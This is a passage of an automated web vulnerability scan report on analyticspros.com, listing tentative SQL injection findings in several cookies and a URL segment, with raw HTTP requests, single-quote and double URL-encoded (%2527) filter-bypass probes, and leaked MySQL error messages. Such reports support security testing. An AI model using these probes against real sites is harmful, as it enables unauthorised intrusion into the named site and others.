HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:18:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:18:35 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:18:35 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.56. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/118-urchin-7-now-available.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:39:11 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:39:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.57. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html'?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 07:21:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html''?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 07:21:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:21:28 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:21:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.58. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:07:37 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:07:37 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.59. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:10:28 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:10:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.60. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:08:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:08:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.61. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:13:00 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:13:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.62. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/75-convert-u5data-error-changing-directories.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:09:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22387


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<div>However, the documentation (at the time of writing this) fails to call out a common issue that I've seen coming up for a number of Urchin users: <strong>
...[SNIP]...

Request 2

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.63. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/75-convert-u5data-error-changing-directories.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
